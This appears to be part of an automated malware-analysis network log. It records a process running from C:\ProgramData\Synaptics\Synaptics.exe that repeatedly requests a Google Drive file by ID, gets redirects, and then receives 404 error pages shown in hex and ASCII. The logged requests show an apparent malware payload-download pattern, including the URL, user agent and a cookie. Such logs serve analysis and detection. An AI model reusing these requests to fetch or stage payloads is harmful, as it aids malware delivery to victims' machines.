                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:37 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 45 56 61 44 72 67 73 56 65 67 77 55 49 51 48 4f 77 43 6d 45 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="KEVaDrgsVegwUIQHOwCmEg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:37 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        107192.168.2.750138142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:39 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:40 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DT41XvRzp2phUw9TZeNgBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        108192.168.2.750139142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:39 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:40 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PRrvAHelIqvRNlHh-4YZDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        109192.168.2.750142142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:40 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:41 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7KspgTarYC98GTxCEEfemMoteZyUovq4tHirlllT1B9zoR1H8Kp42fGTIvxRwih4q6
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-bLwLag8mvozZL2YTB9cKQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:41 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:41 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 45 6b 66 2d 50 77 37 54 69 52 47 32 58 72 31 78 50 74 44 59 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="CEkf-Pw7TiRG2Xr1xPtDYw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        110192.168.2.750141142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:40 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:41 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4hf7sEeORlDyKXjBCDsncCiep8fhwQ_sk3_g3Pm679hxvUW0SELRocx8_RbYk79zJS
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-V7GlkiGI3o_Kb5cmwLQ_OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:41 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:41 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 48 36 79 68 32 54 32 2d 4d 64 43 6e 66 66 62 70 43 41 37 4d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="xH6yh2T2-MdCnffbpCA7Mg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        111192.168.2.750140142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:40 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-5gwrbVGJMn5j4_PnvzFhIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        112192.168.2.750143142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:40 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qdjzyz-F_KivGjwqCgJ5lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        113192.168.2.750146142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:41 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:42 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6cXagbHJkGnYe61YgkcEAzrj60IfJm3lpPnYIfH262dnPF9dkFFSsLdceFM_AN0DriTvcw0hk
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tVAKuSPDVFGiQ8-CkEhiPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:42 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
